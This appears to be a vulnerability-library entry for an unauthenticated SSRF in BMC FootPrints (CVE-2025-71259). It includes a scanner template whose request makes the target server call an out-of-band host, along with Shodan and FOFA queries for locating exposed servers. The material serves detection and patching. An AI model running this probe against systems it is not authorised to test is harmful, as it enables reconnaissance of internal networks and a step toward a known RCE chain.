/Vulnerability Library

BMC FootPrints 'feedUrl' - Server-Side Request Forgery

CVE-2025-71259
Verified

Description

BMC FootPrints versions 20.20.02 through 20.24.01.001 contain a Server-Side Request Forgery (SSRF) vulnerability in the /footprints/servicedesk/externalfeed/RSS endpoint. The 'feedUrl' parameter allows unauthenticated attackers to force the server to make HTTP requests to arbitrary URLs, enabling access to internal services and bypassing firewall restrictions. This vulnerability is part of a pre-authenticated RCE chain when combined with CVE-2025-71257 (auth bypass) and CVE-2025-71260 (deserialization).

Severity

High

CVSS Score

8.6

Exploit Probability

2%

Affected Product

footprints

Published Date

March 18, 2026

Template Author

watchtowr, dhiyaneshdk

CVE-2025-71259.yaml
id: CVE-2025-71259

info:
  name: BMC FootPrints 'feedUrl' - Server-Side Request Forgery
  author: watchTowr,DhiyaneshDk
  severity: high
  description: |
    BMC FootPrints versions 20.20.02 through 20.24.01.001 contain a Server-Side Request Forgery (SSRF) vulnerability in the /footprints/servicedesk/externalfeed/RSS endpoint. The 'feedUrl' parameter allows unauthenticated attackers to force the server to make HTTP requests to arbitrary URLs, enabling access to internal services and bypassing firewall restrictions. This vulnerability is part of a pre-authenticated RCE chain when combined with CVE-2025-71257 (auth bypass) and CVE-2025-71260 (deserialization).
  impact: |
    Authenticated attackers can make the server send arbitrary outbound requests, potentially interacting with internal services or causing denial of service.
  remediation: |
    Apply the hotfixes released by BMC on September 2, 2025 for all affected branches. Update to the latest patched version of BMC FootPrints.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2025-71259
    epss-score: 0.02356
    epss-percentile: 0.85121
    cwe-id: CWE-918
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"/footprints/servicedesk/"
    product: footprints
    vendor: bmc
    fofa-query: body="/footprints/servicedesk/"
  reference:
    - https://labs.watchtowr.com/thanks-itsms-threat-actors-have-never-been-so-organized-bmc-footprints-pre-auth-remote-code-execution-chains/
    - https://docs.bmc.com/xwiki/bin/view/More-Products/Footprints/FootPrints/fp2024/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-71259
  tags: cve,cve2025,servicedesk,bmc-software,ssrf,oast,oob,footprints,bmc

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /footprints/servicedesk/passwordreset/request/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - contains(set_cookie, "SEC_TOKEN=")
        internal: true

  - raw:
      - |
        GET /footprints/servicedesk/externalfeed/RSS?feedUrl=http://{{interactsh-url}}&dataEncoding=x HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - dns
# digest: 4a0a00473045022100a9d7e99cdea033d9c76ba58631346bbb6b8f25ca860ff15fcb4e89609b4712360220415c3e417b3f0de0569a9495052642109185e29e5675715f6829c784757785e9:922c64590222798bb761d5b6d8e72950
8.6Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
CVE ID:
cve-2025-71259
CWE ID:
cwe-918

References

https://labs.watchtowr.com/thanks-itsms-threat-actors-have-never-been-so-organized-bmc-footprints-pre-auth-remote-code-execution-chains/https://docs.bmc.com/xwiki/bin/view/More-Products/Footprints/FootPrints/fp2024/https://nvd.nist.gov/vuln/detail/CVE-2025-71259

Remediation Steps

Apply the hotfixes released by BMC on September 2, 2025 for all affected branches. Update to the latest patched version of BMC FootPrints.